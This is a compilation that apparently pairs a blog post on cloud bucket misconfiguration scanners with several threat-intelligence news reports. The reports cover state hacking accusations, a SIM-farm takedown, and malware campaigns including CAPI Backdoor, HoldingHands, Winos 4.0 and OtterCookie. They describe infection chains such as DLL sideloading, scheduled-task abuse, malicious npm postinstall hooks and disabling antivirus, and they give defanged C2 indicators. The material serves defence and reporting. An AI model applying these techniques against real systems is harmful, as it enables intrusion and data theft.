Most Cloud Breaches Aren’t Hacks — They’re Misconfigurations. Here’s How to Fix Them — Cloud storage buckets like AWS S3, Azure Blob, and Google Cloud Storage make data sharing easy — but one wrong setting can expose everything. Most data leaks happen not because of hacking, but because someone left a public bucket, skipped encryption, or used a test bucket that never got locked down. Cloud platforms give you flexibility, not guaranteed safety, so you need to check and control access yourself.

Misconfigurations usually happen when permissions are too broad, encryption is disabled, or visibility is lost across multiple clouds. Doing manual checks doesn’t scale — especially if you manage data in AWS, Azure, and GCP. The fix is using tools that automatically find, report, and even fix unsafe settings before they cause damage.

ScoutSuite is a strong starting point for cross-cloud visibility. It scans AWS, Azure, and GCP for open buckets, weak IAM roles, and missing encryption, then creates an easy-to-read HTML report. **Prowler** goes deeper into AWS, checking S3 settings against CIS and AWS benchmarks to catch bad ACLs or unencrypted buckets.

For ongoing control, Cloud Custodian lets you write simple policies that automatically enforce rules — for example, forcing all new buckets to use encryption. And CloudQuery can turn your cloud setup into a searchable database, so you can monitor changes, track compliance, and visualize risks in one place.

The best approach is to combine them: run ScoutSuite or Prowler weekly to find issues, and let Cloud Custodian handle automatic fixes. Even a few hours spent setting these up can stop the kind of data leaks that make headlines. Always assume every bucket is public until proven otherwise — and secure it like it is.

Conclusion

The truth is, no tool or patch will ever make us fully secure. What matters most is awareness — knowing what’s normal, what’s changing, and how attackers think. Every alert, log, or minor anomaly is a clue. Keep connecting those dots before someone else does.

Oct 20, 2025Ravie LakshmananCyber Espionage / National Security

China on Sunday accused the U.S. National Security Agency (NSA) of carrying out a “premeditated” cyber attack targeting the National Time Service Center (NTSC), as it described the U.S. as a “hacker empire” and the “greatest source of chaos in cyberspace.”

The Ministry of State Security (MSS), in a WeChat post, said it uncovered “irrefutable evidence” of the agency’s involvement in the intrusion that dated back to March 25, 2022. The attack was ultimately foiled, it added.

Established in 1966 under the jurisdiction of the Chinese Academy of Sciences (CAS), NTSC is responsible for generating, maintaining, and transmitting the national standard of time (Beijing Time).

“Any cyberattack damaging these facilities would jeopardize the secure and stable operation of ‘Beijing Time,’ triggering severe consequences such as network communication failures, financial system disruptions, power supply interruptions, transportation paralysis, and space launch failures,” the MSS said.

“This operation thwarted U.S. attempts to steal secrets and conduct sabotage through cyberattacks, fully safeguarding the security of ‘Beijing Time.’”

According to details shared in the WeChat post, the NSA is said to have exploited security flaws in an unnamed foreign brand’s SMS service to stealthily compromise mobile devices belonging to several staff members at NTSC, resulting in the theft of sensitive data. It did not disclose the nature of the vulnerabilities used to conduct the attack.

On April 18 the following year, the MSS claimed that the agency repeatedly used stolen login credentials to break into the computers at the center to probe its infrastructure, followed by deploying a new “cyber warfare platform” between August 2023 and June 2024.

The platform activated what it described as 42 specialized tools to mount high-intensity attacks aimed at multiple internal network systems of NTSC. The attacks also involved attempts to conduct lateral movement to a high-precision ground-based timing system with the alleged goal of disrupting it.

The attacks, launched between late night and early morning Beijing time, involved the use of virtual private servers (VPSes) based in the U.S., Europe, and Asia to route malicious traffic and conceal its origins.

“They employed tactics such as forging digital certificates to bypass antivirus software and employed high-strength encryption algorithms to thoroughly erase attack traces, leaving no stone unturned in their efforts to carry out cyberattacks and infiltration activities,” the MSS said.

The ministry said China’s national security agencies neutralized the attack and implemented additional security measures. It also accused the U.S. of launching persistent cyber attacks against China, Southeast Asia, Europe, and South America, adding that it leverages technological footholds in the Philippines, Japan, and China’s Taiwan Province to launch these activities and obscure its own involvement.

“Simultaneously, the U.S. has resorted to crying wolf, repeatedly hyping the ‘China cyber threat theory,’ coercing other countries to amplify so-called ‘Chinese hacking incidents,’ sanctioning Chinese enterprises, and prosecuting Chinese citizens – all in a futile attempt to confuse the public and distort the truth,” it alleged.

Oct 19, 2025Ravie LakshmananSIM Swapping / Cryptocurrency

Europol on Friday announced the disruption of a sophisticated cybercrime-as-a-service (CaaS) platform that operated a SIM farm and enabled its customers to carry out a broad spectrum of crimes ranging from phishing to investment fraud.

The coordinated law enforcement effort, dubbed Operation SIMCARTEL, saw 26 searches carried out, resulting in the arrest of seven suspects and the seizure of 1,200 SIM box devices, which contained 40,000 active SIM cards. Five of those detained are Latvian nationals.

In addition, five servers were dismantled and two websites gogetsms[.]com and apisim[.]com) advertising the service was taken over on October 10, 2025, to display a seizure banner. Separately, four luxury vehicles were confiscated, and €431,000 ($502,000) in suspects’ bank accounts and €266,000 ($310,000) in their cryptocurrency accounts were frozen.

The countries that participated in the operation comprised authorities from Austria, Estonia, Finland, and Latvia, in collaboration with Europol and Eurojust.

According to Europol, the criminal network has been attributed to more than 1,700 individual cyber fraud cases in Austria and 1,500 in Latvia, leading to losses totaling around €4.5 million ($5.25 million) and €420,000 ($489,000) in the two countries, respectively.

“The criminal network and its infrastructure were technically highly sophisticated and enabled perpetrators around the world to use this SIM-box service to conduct a wide range of telecommunications-related cybercrimes, as well as other crimes,” the agency said.

The infrastructure offered telephone numbers registered to people from over 80 countries for use in criminal activities, including setting up fake accounts on social media and communication platforms with the primary goal of obscuring their original identity and location. In all, the service enabled the creation of more than 49 million online accounts.

These accounts were then used to conduct phishing and smishing attacks and carry out financial fraud by tricking victims into investing their funds in bogus trading schemes. Another involved contacting them on WhatsApp by posing as their daughter or son, claiming they now have a new number and asking them to transfer money in the four-figure range for an emergency.

Some of the other offenses that were made possible via the platform included extortion, migrant smuggling, and the distribution of child sexual abuse material (CSAM).

According to snapshots captured on the Internet Archive, GoGetSMS was marketed as a way to get “fast and secure temporary phone numbers,” with more than 10 million numbers available and receive verification codes from over 160 online services.

On its website, GoGetSMS also offered the ability to monetize existing SIM cards by turning them into “powerful assets for generating passive income” using its “specialized software,” allowing card owners to earn revenue for every SMS message sent to them.

On review website Trustpilot, paid users have complained of facing issues getting hold of a temporary number through GoGetSMS, with one user claiming that they paid for a U.S. number on the platform and did not get a working number in return. “Tried multiple times, wasted both time and money. Support is completely unresponsive – no help, no refund, nothing,” the user added.

The Latvian State Police, in a coordinated announcement, said the platform was designed for anonymous communication and payments, impacting 3,200 people in various countries.

Oct 18, 2025Ravie LakshmananThreat Intelligence / Cybercrime

Cybersecurity researchers have shed light on a new campaign that has likely targeted the Russian automobile and e-commerce sectors with a previously undocumented .NET malware dubbed CAPI Backdoor.

According to Seqrite Labs, the attack chain involves distributing phishing emails containing a ZIP archive as a way to trigger the infection. The cybersecurity company’s analysis is based on the ZIP artifact that was uploaded to the VirusTotal platform on October 3, 2025.

Present with the archive is a decoy Russian-language document that purports to be a notification related to income tax legislation and a Windows shortcut (LNK) file.

The LNK file, which has the same name as the ZIP archive (i.e., “Перерасчет заработной платы 01.10.2025”), is responsible for the execution of the .NET implant (“adobe.dll”) using a legitimate Microsoft binary named “rundll32.exe,” a living-off-the-land (LotL) technique known to be adopted by threat actors.

The backdoor, Seqrite noted, comes with functions to check if it’s running with administrator-level privileges, gather a list of installed antivirus products, and open the decoy document as a ruse, while it stealthily connects to a remote server (“91.223.75[.]96”) to receive further commands for execution.

The commands allow CAPI Backdoor to steal data from web browsers like Google Chrome, Microsoft Edge, and Mozilla Firefox; take screenshots; collect system information; enumerate folder contents; and exfiltrate the results back to the server.

It also attempts to run a long list of checks to determine if it’s a legitimate host or a virtual machine, and makes use of two methods to establish persistence, including setting up a scheduled task and creating a LNK file in the Windows Startup folder to automatically launch the backdoor DLL copied to the Windows Roaming folder.

Seqrite’s assessment that the threat actor is targeting the Russian automobile sector is down to the fact that one of the domains linked to the campaign is named carprlce[.]ru, which appears to impersonate the legitimate “carprice[.]ru.”

“The malicious payload is a .NET DLL that functions as a stealer and establishes persistence for future malicious activities,” researchers Priya Patel and Subhajeet Singha said.

The threat actors behind a malware family known as Winos 4.0 (aka ValleyRAT) have expanded their targeting footprint from China and Taiwan to target Japan and Malaysia with another remote access trojan (RAT) tracked as HoldingHands RAT (aka Gh0stBins).

“The campaign relied on phishing emails with PDFs that contained embedded malicious links,” Pei Han Liao, researcher with Fortinet’s FortiGuard Labs, said in a report shared with The Hacker News. “These files masqueraded as official documents from the Ministry of Finance and included numerous links in addition to the one that delivered Winos 4.0.”

Winos 4.0 is a malware family that’s often spread via phishing and search engine optimization (SEO) poisoning, directing unsuspecting users to fake websites masquerading as popular software like Google Chrome, Telegram, Youdao, Sogou AI, WPS Office, and DeepSeek, among others.

The use of Winos 4.0 is primarily linked to an “aggressive” Chinese cybercrime group known as Silver Fox, which is also tracked as SwimSnake, The Great Thief of Valley (or Valley Thief), UTG-Q-1000, and Void Arachne.

Last month, Check Point attributed the threat actor to the abuse of a previously unknown vulnerable driver associated with WatchDog Anti-malware as part of a Bring Your Own Vulnerable Driver (BYOVD) attack aimed at disabling security software installed on compromised hosts.

Then weeks later, Fortinet shed light on another campaign that took place in August 2025, leveraging SEO poisoning to distribute HiddenGh0st and modules associated with the Winos malware.

Silver Fox’s targeting of Taiwan and Japan with HoldingHands RAT was also documented by the cybersecurity company and a security researcher named somedieyoungZZ back in June, with the attackers employing phishing emails containing booby-trapped PDF documents to activate a multi-stage infection that ultimately deploys the trojan.

It’s worth noting at this stage that both Winos 4.0 and HoldingHands RAT are inspired by another RAT malware referred to as Gh0st RAT, which had its source code leaked in 2008 and has since been widely adopted by various Chinese hacking groups.

Fortinet said it identified PDF documents posing as a tax regulation draft for Taiwan that included a URL to a Japanese language web page (“twsww[.]xin/download[.]html”), from where victims are prompted to download a ZIP archive responsible for delivering HoldingHands RAT.

The starting point is an executable claiming to be an excise audit document. It’s used to sideload a malicious DLL, which functions as a shellcode loader for “sw.dat,” a payload that’s designed to run anti-virtual machine (VM) checks, enumerate active processes against a list of security products from Avast, Norton, and Kaspersky, and terminate them if found, escalate privileges, and terminate the Task Scheduler.

It also drops several other files in the system’s C:WindowsSystem32 folder –

• svchost.ini, which contains the Relative Virtual Address (RVA) of VirtualAlloc function
• TimeBrokerClient.dll, the legitimate TimeBrokerClient.dll renamed as BrokerClientCallback.dll.
• msvchost.dat, which contains the encrypted shellcode
• system.dat, which contains the encrypted payload
• wkscli.dll, an unused DLL

“The Task Scheduler is a Windows service hosted by svchost.exe that allows users to control when specific operations or processes are run,” Fortinet said. “The Task Scheduler’s recovery setting is configured to restart the service one minute after it fails by default.”

“When the Task Scheduler is restarted, svchost.exe is executed and loads the malicious TimeBrokerClient.dll. This trigger mechanism does not require the direct launch of any process, making behavior-based detection more challenging.”

The primary function of “TimeBrokerClient.dll” is to allocate memory for the encrypted shellcode within “msvchost.dat” by invoking the VirtualAlloc() function using the RVA value specified in “svchost.ini.” In the next stage, “msvchost.dat” decrypts the payload stored in “system.dat” to retrieve the HoldingHands payload.

HoldingHands is equipped to connect to a remote server, send host information to it, send a heartbeat signal every 60 seconds to maintain the connection, and receive and process attacker-issued commands on the infected system. These commands allow the malware to capture sensitive information, run arbitrary commands, and download additional payloads.

A new feature addition is a new command that makes it possible to update the command-and-control (C2) address used for communications via a Windows Registry entry.

Operation Silk Lure Targets China with ValleyRAT

The development comes as Seqrite Labs detailed an ongoing email-based phishing campaign that has leveraged C2 infrastructure hosted in the U.S., targeting Chinese companies in the fintech, cryptocurrency, and trading platform sectors to ultimately deliver Winos 4.0. The campaign has been codenamed Operation Silk Lure, owing to its China-related footprint.

“The adversaries craft highly targeted emails impersonating job seekers and send them to HR departments and technical hiring teams within Chinese firms,” researchers Dixit Panchal, Soumen Burma, and Kartik Jivani said.

“These emails often contain malicious .LNK (Windows shortcut) files embedded within seemingly legitimate résumés or portfolio documents. When executed, these .LNK files act as droppers, initiating the execution of payloads that facilitate initial compromise.”

The LNK file, when launched, runs PowerShell code to download a decoy PDF resume, while stealthily dropping three additional payloads to the “C:Users<user>AppDataRoamingSecurity” location and executing it. The PDF resumes are localized and tailored for Chinese targets so as to increase the likelihood of success of the social engineering attack.

The payloads dropped are as follows –

• CreateHiddenTask.vbs, which creates a scheduled task to launch “keytool.exe” every day at 8:00 a.m.
• keytool.exe, which uses DLL side-loading to load jli.dll
• jli.dll, a malicious DLL that launches the Winos 4.0 malware encrypted and embedded within keytool.exe

“The deployed malware establishes persistence within the compromised system and initiates various reconnaissance operations,” the researchers said. “These include capturing screenshots, harvesting clipboard contents, and exfiltrating critical system metadata.”

The trojan also comes with various techniques to evade detection, including attempting to uninstall detected antivirus products and terminating network connections associated with security programs such as Kingsoft Antivirus, Huorong, or 360 Total Security to interfere with their regular functions.

“This exfiltrated information significantly elevates the risk of advanced cyber espionage, identity theft, and credential compromise, thereby posing a serious threat to both organizational infrastructure and individual privacy,” the researchers added.

The North Korean threat actor linked to the Contagious Interview campaign has been observed merging some of the functionality of two of its malware programs, indicating that the hacking group is actively refining its toolset.

That’s according to new findings from Cisco Talos, which said recent campaigns undertaken by the hacking group have seen the functions of BeaverTail and OtterCookie coming closer to each other more than ever, even as the latter has been fitted with a new module for keylogging and taking screenshots.

The activity is attributed to a threat cluster that’s tracked by the cybersecurity community under the monikers CL-STA-0240, DeceptiveDevelopment, DEV#POPPER, Famous Chollima, Gwisin Gang, PurpleBravo, Tenacious Pungsan, UNC5342, and Void Dokkaebi.

The development comes as Google Threat Intelligence Group (GTIG) and Mandiant revealed the threat actor’s use of a stealthy technique known as EtherHiding to fetch next-stage payloads from the BNB Smart Chain (BSC) or Ethereum blockchains, essentially turning decentralized infrastructure into a resilient command-and-control (C2) server. It represents the first documented case of a nation-state actor utilizing the method that has been otherwise adopted by cybercrime groups.

Contagious Interview refers to an elaborate recruitment scam that began sometime around late 2022, with the North Korean threat actors impersonating hiring organizations to target job seekers and deceiving them into installing information-stealing malware as part of a supposed technical assessment or coding task, resulting in the theft of sensitive data and cryptocurrency.

In recent months, the campaign has undergone several shifts, including leveraging ClickFix social engineering techniques for delivering malware strains such as GolangGhost, PylangGhost, TsunamiKit, Tropidoor, and AkdoorTea. Central to the attacks, however, are malware families known as BeaverTail, OtterCookie, and InvisibleFerret.

BeaverTail and OtterCookie are separate but complementary malware tools, with the latter first spotted in real-world attacks in September 2024. Unlike BeaverTail, which functions as an information stealer and downloader, initial interactions of OtterCookie were designed to contact a remote server and fetch commands to be executed on the compromised host.

Interestingly, the malicious software includes a dependency via a package called “node-nvm-ssh” published to the official npm repository on August 20, 2025, by a user named “trailer.” The package attracted a total of 306 downloads, before it was taken down by the npm maintainers six days later.

It’s also worth noting that the npm package in question is one of the 338 malicious Node libraries flagged earlier this week by software supply chain security company Socket as connected to the Contagious Interview campaign.

The package, once installed, triggers the malicious behavior by means of a postinstall hook in its package.json file that’s configured to run a custom script called “skip” so as to launch a JavaScript payload (“index.js”), which, in turn, loads another JavaScript (“file15.js”) responsible for executing the final-stage malware.

Further analysis of the tool used in the attack has found that “it had characteristics of BeaverTail and of OtterCookie, blurring the distinction between the two,” security researchers Vanja Svajcer and Michael Kelley said, adding it incorporated a new keylogging and screenshotting module that uses legitimate npm packages like “node-global-key-listener” and “screenshot-desktop” to capture keystrokes and take screenshots, respectively, and exfiltrate the information to the C2 server.

At least one version of this new module comes equipped with an auxiliary clipboard monitoring feature to siphon clipboard content. The emergence of the new version of OtterCookie paints a picture of a tool that has evolved from basic data-gathering to a modular program for data theft and remote command execution.

Also present in the malware, codenamed OtterCookie v5, are functions akin to BeaverTail to enumerate browser profiles and extensions, steal data from web browsers and cryptocurrency wallets, install AnyDesk for persistent remote access, as well as download a Python backdoor referred to as InvisibleFerret.

Some of the other modules present in OtterCookie are listed below –

• Remote shell module, which sends system information and clipboard content to the C2 server and installs the “socket.io-client” npm package to connect to a specific port on the OtterCookie C2 server and receive further commands for execution
• File uploading module, which systematically enumerates all drives and traverses the file system in order to find files matching certain extensions and naming patterns (e.g., metamask, bitcoin, backup, and phrase) to be uploaded to the C2 server
• Cryptocurrency extensions stealer module, which extracts data from cryptocurrency wallet extensions installed on Google Chrome and Brave browsers (the list of extensions targeted partially overlaps with that of BeaverTail)

Furthermore, Talos said it detected Qt-based BeaverTail artifact and a malicious Visual Studio Code extension containing BeaverTail and OtterCookie code, raising the possibility that the group may be experimenting with new methods of malware delivery.

“The extension could also be a result of experimentation from another actor, possibly even a researcher, who is not associated with Famous Chollima, as this stands out from their usual TTPs,” the researchers noted.